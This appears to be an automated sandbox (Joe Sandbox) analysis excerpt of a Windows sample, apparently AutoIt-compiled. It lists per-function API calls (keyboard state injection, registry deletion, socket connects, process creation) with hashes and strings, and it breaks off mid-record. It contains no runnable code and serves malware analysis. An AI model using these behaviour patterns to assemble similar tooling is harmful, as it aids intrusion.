                                                            • Instruction Fuzzy Hash: 14618B71A00619DFCF14DF68C8819AEBBFAFF49310B10856DE815ABB91DB34AD41CB94
                                                            APIs
                                                            • GetParent.USER32(?), ref: 006F0F8C
                                                            • GetKeyboardState.USER32(?), ref: 006F0FA1
                                                            • SetKeyboardState.USER32(?), ref: 006F1002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 006F1030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 006F104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 006F1095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006F10B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
                                                            • Instruction ID: 15f0e1deaaea3e8d1190dc4a39936bde332fac40fe5e173c4649a91b85309ce7
                                                            • Opcode Fuzzy Hash: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
                                                            • Instruction Fuzzy Hash: A05113605047D9BDFB3282348C05BF6BEAB5B07344F08858DE2D58A9C3CA98DCC5D750
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 006F0DA5
                                                            • GetKeyboardState.USER32(?), ref: 006F0DBA
                                                            • SetKeyboardState.USER32(?), ref: 006F0E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006F0E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006F0E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006F0EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006F0EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
                                                            • Instruction ID: a4115f59cd0684b45347835aef03d05bb6f81a84828d1253eb371535368de651
                                                            • Opcode Fuzzy Hash: 9b7023d97f5f1f56f40d211dc7954ddf2b953f56f03394eba0720a143997c112
                                                            • Instruction Fuzzy Hash: A451D4A06487D97DFB3283648C55BFABEAA6F06300F088889E2D44A5C3D395EC98D750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 02995e83a3c178e9bedf599d0cd07ab435b57c5dcacb407ae585322bb1d2101e
                                                            • Instruction ID: 9e41daa15a6dad246ca17533b602af1282c3003868e06fee2d2538dce3849823
                                                            • Opcode Fuzzy Hash: 02995e83a3c178e9bedf599d0cd07ab435b57c5dcacb407ae585322bb1d2101e
                                                            • Instruction Fuzzy Hash: 8D41D8A6C1021876CB51FBB48C469DFB3BA9F04310F50855AE615E3221FB34A685C7EE
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006ED5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006ED60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006ED61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006ED69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,r$DllGetClassObject
                                                            • API String ID: 753597075-4218317632
                                                            • Opcode ID: 05f122d309c96627314a07a8181e218d8cfb3125eb8106815fb8e566cd2f461d
                                                            • Instruction ID: fd375ff123315b053f56117fc5b761604c9fa6253369fbec8dff5659aed0d82e
                                                            • Opcode Fuzzy Hash: 05f122d309c96627314a07a8181e218d8cfb3125eb8106815fb8e566cd2f461d
                                                            • Instruction Fuzzy Hash: 4141ACB1602354EFDB04CF25C884A9ABBAAEF44310F1181ADEC099F246D7B5D940CBA4
                                                            APIs
                                                              • Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F3697,?), ref: 006F468B
                                                              • Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F3697,?), ref: 006F46A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006F36B7
                                                            • _wcscmp.LIBCMT ref: 006F36D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 006F36EB
                                                            • _wcscat.LIBCMT ref: 006F3733
                                                            • SHFileOperationW.SHELL32(?), ref: 006F379F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: e20576511cdd98ec92ecfc115d43d9d374d97b3bb4d624ca7b49e73b180ee5b4
                                                            • Instruction ID: 465dd4096af47b5fb489998876169397533c6dde628ce8325127e38a73446231
                                                            • Opcode Fuzzy Hash: e20576511cdd98ec92ecfc115d43d9d374d97b3bb4d624ca7b49e73b180ee5b4
                                                            • Instruction Fuzzy Hash: FA4183B1508348AEC792EF64C441AEF77E9AF89340F00092EF599C7351EB34D689C75A
                                                            APIs
                                                            • _memset.LIBCMT ref: 007172AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00717351
                                                            • IsMenu.USER32(?), ref: 00717369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007173B1
                                                            • DrawMenuBar.USER32 ref: 007173C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: fb6c28a95fd9a89f22af012a204f7b6508fccbb833fa5b5dbf5b8a2866cc16fc
                                                            • Instruction ID: 8b5f867f2f83343a0dcb86097c07c6dc8fd7eb92aecac0308b9d05d90a717b26
                                                            • Opcode Fuzzy Hash: fb6c28a95fd9a89f22af012a204f7b6508fccbb833fa5b5dbf5b8a2866cc16fc
                                                            • Instruction Fuzzy Hash: DA413875A04249EFDB24DF58D884ADABBF9FB08310F14852AFD2597290D738AD90DF60
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00710FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00710FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 007110B5
                                                              • Part of subcall function 00710FA5: RegCloseKey.ADVAPI32(?), ref: 0071101B
                                                              • Part of subcall function 00710FA5: FreeLibrary.KERNEL32(?), ref: 0071106D
                                                              • Part of subcall function 00710FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00711090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00711058
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: e4e32418c5dacfd6dae0c0f67c86b4d76ae2bf80c5688c3dd571504bf4d03ab2
                                                            • Instruction ID: d392ce0c417e42e9ebdccecc1125ecd1d3e0d12a55ed1679386a03c2baf17401
                                                            • Opcode Fuzzy Hash: e4e32418c5dacfd6dae0c0f67c86b4d76ae2bf80c5688c3dd571504bf4d03ab2
                                                            • Instruction Fuzzy Hash: 87310C71D01109FFDB25DB98DC89AFFB7BCEF08300F404169E605A6191EA789EC59AA4
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007162EC
                                                            • GetWindowLongW.USER32(00D26AD0,000000F0), ref: 0071631F
                                                            • GetWindowLongW.USER32(00D26AD0,000000F0), ref: 00716354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00716386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007163B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 007163C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007163DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 5691e03b6b51c0464b118457de3a7826c5127a294456614345c9f8e931a28482
                                                            • Instruction ID: 77c1446b033c24ef3b9c38361bee80abc75dc79a74c88beb63a19ecb4eb969ef
                                                            • Opcode Fuzzy Hash: 5691e03b6b51c0464b118457de3a7826c5127a294456614345c9f8e931a28482
                                                            • Instruction Fuzzy Hash: 7731FE30644250EFDB20CF1DDC84F9837E1BB4A715F1981A8F9219B2F2CB7AA8809B54
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDB54
                                                            • SysAllocString.OLEAUT32(00000000), ref: 006EDB57
                                                            • SysAllocString.OLEAUT32(?), ref: 006EDB75
                                                            • SysFreeString.OLEAUT32(?), ref: 006EDB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006EDBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 006EDBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 58a99d063a5ad629567fb0b428b76359b42278f506fcd6869c6359e88cdd5ffb
                                                            • Instruction ID: af63ab431f2592e03d6578c0ce5b07725ae3f1c5aff67394d46e3d6dea0b9dad
                                                            • Opcode Fuzzy Hash: 58a99d063a5ad629567fb0b428b76359b42278f506fcd6869c6359e88cdd5ffb
                                                            • Instruction Fuzzy Hash: BF218EB6601259AFAF10DFA9DC88CFB77ADEB09360B01C529FD14DB2A0E6749C418764
                                                            APIs
                                                              • Part of subcall function 00707D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00707DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007061C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 007061D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0070620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00706217
                                                            • WSAGetLastError.WSOCK32 ref: 00706221
                                                            • closesocket.WSOCK32(00000000), ref: 0070624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00706263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: b561d6d2369d198dbfc38d647bdb890b3c853342726145e4953e8115637c6683
                                                            • Instruction ID: f0d612537497207d94e017398c9f72cb70444040efb572bd26e26634b145b8a6
                                                            • Opcode Fuzzy Hash: b561d6d2369d198dbfc38d647bdb890b3c853342726145e4953e8115637c6683
                                                            • Instruction Fuzzy Hash: 66319E71600108EBDF10AF28CC95BBA7BEDEB45760F04812DF905A72D1DB78AC548AA5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 6f5e27b532be1a028da15b68ebf3e719674f9b844974060ec80f9b5ed43e0f9d
                                                            • Instruction ID: 92d3f7b0b4139e0153f14791a53a7e2a5433342dc4863ef60a6cb6aafead30c4
                                                            • Opcode Fuzzy Hash: 6f5e27b532be1a028da15b68ebf3e719674f9b844974060ec80f9b5ed43e0f9d
                                                            • Instruction Fuzzy Hash: D42137B22067A167DA20A736BC02EE773DBEF56350F50403DF44686251EBA19D82D399
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDC09
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDC2F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 006EDC32
                                                            • SysAllocString.OLEAUT32 ref: 006EDC53
                                                            • SysFreeString.OLEAUT32 ref: 006EDC5C
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006EDC76
                                                            • SysAllocString.OLEAUT32(?), ref: 006EDC84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: bd69ad0020a403550ad094a41610a6d3ea987ea281b028862b3730f72203df0c
                                                            • Instruction ID: 15407c3de90d9ac0a337c00fb58baaee6a5cb7e63720e220232020b30334edc1
                                                            • Opcode Fuzzy Hash: bd69ad0020a403550ad094a41610a6d3ea987ea281b028862b3730f72203df0c
                                                            • Instruction Fuzzy Hash: B9216075605244AFAB10DBADDC88DEB77ADEB08760B10C125FD14CB2A0DAB4EC41C768
                                                            APIs
                                                              • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                              • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                              • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00717632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0071763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0071764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00717659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00717665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: c6d09ff0905554609db88a51251a92f8db5454599b690d3e12d9c29cf12a9cd8
                                                            • Instruction ID: afda9e763c3e15f52ab2b8ed3076ed14f787dfd99fcb8bdbed5a96869032c9cb
                                                            • Opcode Fuzzy Hash: c6d09ff0905554609db88a51251a92f8db5454599b690d3e12d9c29cf12a9cd8
                                                            • Instruction Fuzzy Hash: D311B6B1150219BFEF158F68CC85EE77F6DEF08798F114114F604A6090C7769C61DBA4
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 006B9AE6
                                                              • Part of subcall function 006B3187: EncodePointer.KERNEL32(00000000), ref: 006B318A
                                                              • Part of subcall function 006B3187: __initp_misc_winsig.LIBCMT ref: 006B31A5
                                                              • Part of subcall function 006B3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006B9EA0
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006B9EB4
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006B9EC7
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006B9EDA
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006B9EED
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006B9F00
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 006B9F13
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006B9F26
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 006B9F39
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006B9F4C
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006B9F5F
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006B9F72
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006B9F85
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006B9F98
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006B9FAB
                                                              • Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006B9FBE
                                                            • __mtinitlocks.LIBCMT ref: 006B9AEB
                                                            • __mtterm.LIBCMT ref: 006B9AF4
                                                              • Part of subcall function 006B9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,006B9AF9,006B7CD0,0074A0B8,00000014), ref: 006B9C56
                                                              • Part of subcall function 006B9B5C: _free.LIBCMT ref: 006B9C5D
                                                              • Part of subcall function 006B9B5C: DeleteCriticalSection.KERNEL32(02u,?,?,006B9AF9,006B7CD0,0074A0B8,00000014), ref: 006B9C7F
                                                            • __calloc_crt.LIBCMT ref: 006B9B19
                                                            • __initptd.LIBCMT ref: 006B9B3B
                                                            • GetCurrentThreadId.KERNEL32 ref: 006B9B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: 4f7c94c99832ecdf0a393a1ff310007874411587febebda1696b417bc8de01fc
                                                            • Instruction ID: f8110212f0b758c187a2270f7ff4b370c33ec54baf435c2437a6dfad159ae8bb
                                                            • Opcode Fuzzy Hash: 4f7c94c99832ecdf0a393a1ff310007874411587febebda1696b417bc8de01fc
                                                            • Instruction Fuzzy Hash: 17F096B25197116AE6B47775BC036CB36979F02734F204A1EF754C62D2EF1094C14779
                                                            APIs
                                                            • _memset.LIBCMT ref: 0071B644
                                                            • _memset.LIBCMT ref: 0071B653
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00756F20,00756F64), ref: 0071B682
                                                            • CloseHandle.KERNEL32 ref: 0071B694
                                                            Strings
